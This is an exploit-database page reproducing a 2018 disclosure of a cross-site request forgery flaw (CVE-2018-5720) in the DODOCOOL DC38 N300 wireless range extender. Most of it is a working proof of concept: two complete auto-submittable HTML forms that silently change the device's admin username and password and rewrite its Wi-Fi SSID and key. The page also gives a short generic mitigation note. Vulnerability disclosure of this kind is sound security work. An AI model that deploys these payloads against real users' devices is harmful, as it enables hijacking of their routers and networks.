header-logo
Suggest Exploit
vendor:
DC38 3-in-1 N300 Mini Wireless Range Extend
by:
Raffaele Sabato
8.8
CVSS
HIGH
Cross-site Request Forgery (CSRF)
352
CWE
Product Name: DC38 3-in-1 N300 Mini Wireless Range Extend
Affected Version From: RTN2-AW.GD.R3465.1.20161103
Affected Version To: RTN2-AW.GD.R3465.1.20161103
Patch Exists: YES
Related CWE: CVE-2018-5720
CPE: h:dodocool:dc38_3-in-1_n300_mini_wireless_range_extend
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

DODOCOOL DC38 N300 Cross-site Request Forgery

An issue was discovered in DODOCOOL DC38 3-in-1 N300 Mini Wireless Range Extend RTN2-AW.GD.R3465.1.20161103 devices. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to username and/or password changing, Wi-Fi password changing, etc.

Mitigation:

The best way to mitigate CSRF attacks is to use a combination of both server-side and client-side security measures. Server-side measures include using a unique token for each request, validating the origin of the request, and using a secure connection. Client-side measures include using a secure connection, validating the origin of the request, and using a unique token for each request.
Source

Exploit-DB raw data:

# Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery
# Date: 17-01-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: DODOCOOL
# Vendor Homepage: www.dodocool.com
# Version: RTN2-AW.GD.R3465.1.20161103
# CVE: CVE-2018-5720

I DESCRIPTION
========================================================================

An issue was discovered in DODOCOOL DC38 3-in-1 N300 Mini Wireless Range
Extend RTN2-AW.GD.R3465.1.20161103 devices. A Cross-site request forgery
(CSRF) vulnerability allows remote attackers to hijack the authentication
of users for requests that modify the configuration.
This vulnerability may lead to username and/or password changing, Wi-Fi
password changing, etc.

II PROOF OF CONCEPT
========================================================================

## Change user username and password (test_username:test_password):

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.10.1/boafrm/formPasswordSetup"
method="POST">
      <input type="hidden" name="submit&#45;url"
value="&#47;setok&#46;htm&#63;bw&#61;main&#46;htm" />
      <input type="hidden" name="submit&#45;value" value="" />
      <input type="hidden" name="username" value="test&#95;username" />
      <input type="hidden" name="newpass" value="test&#95;password" />
      <input type="hidden" name="confpass" value="test&#95;password" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


## Change WiFi Configuration (WIFI_TEST:TestTest):

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.10.1/boafrm/formWlanSetupREP"
method="POST">
      <input type="hidden" name="submit&#45;url"
value="&#47;setok&#46;htm&#63;bw&#61;wl&#95;rep&#46;htm" />
      <input type="hidden" name="submit&#45;value" value="repset" />
      <input type="hidden" name="wl&#95;onoff" value="0" />
      <input type="hidden"
name="wps&#95;clear&#95;configure&#95;by&#95;reg" value="0" />
      <input type="hidden" name="wlProfileId" value="" />
      <input type="hidden" name="wl&#95;mode" value="0" />
      <input type="hidden" name="wl&#95;authType" value="auto" />
      <input type="hidden" name="wepEnabled" value="ON" />
      <input type="hidden" name="weplength" value="" />
      <input type="hidden" name="wepformat" value="" />
      <input type="hidden" name="wl&#95;wpaAuth" value="psk" />
      <input type="hidden" name="wl&#95;pskFormat" value="0" />
      <input type="hidden" name="wl&#95;pskValue" value="TestTest" />
      <input type="hidden" name="wl&#95;ssid" value="WIFI_TEST" />
      <input type="hidden" name="wl&#95;Method" value="6" />
      <input type="hidden" name="wep&#95;key" value="" />
      <input type="hidden" name="ciphersuite" value="tkip&#43;aes" />
      <input type="hidden" name="ciphersuite" value="aes" />
      <input type="hidden" name="wpa2ciphersuite" value="tkip&#43;aes" />
      <input type="hidden" name="wpa2ciphersuite" value="aes" />
      <input type="hidden" name="web&#95;pskValue" value="TestTest" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR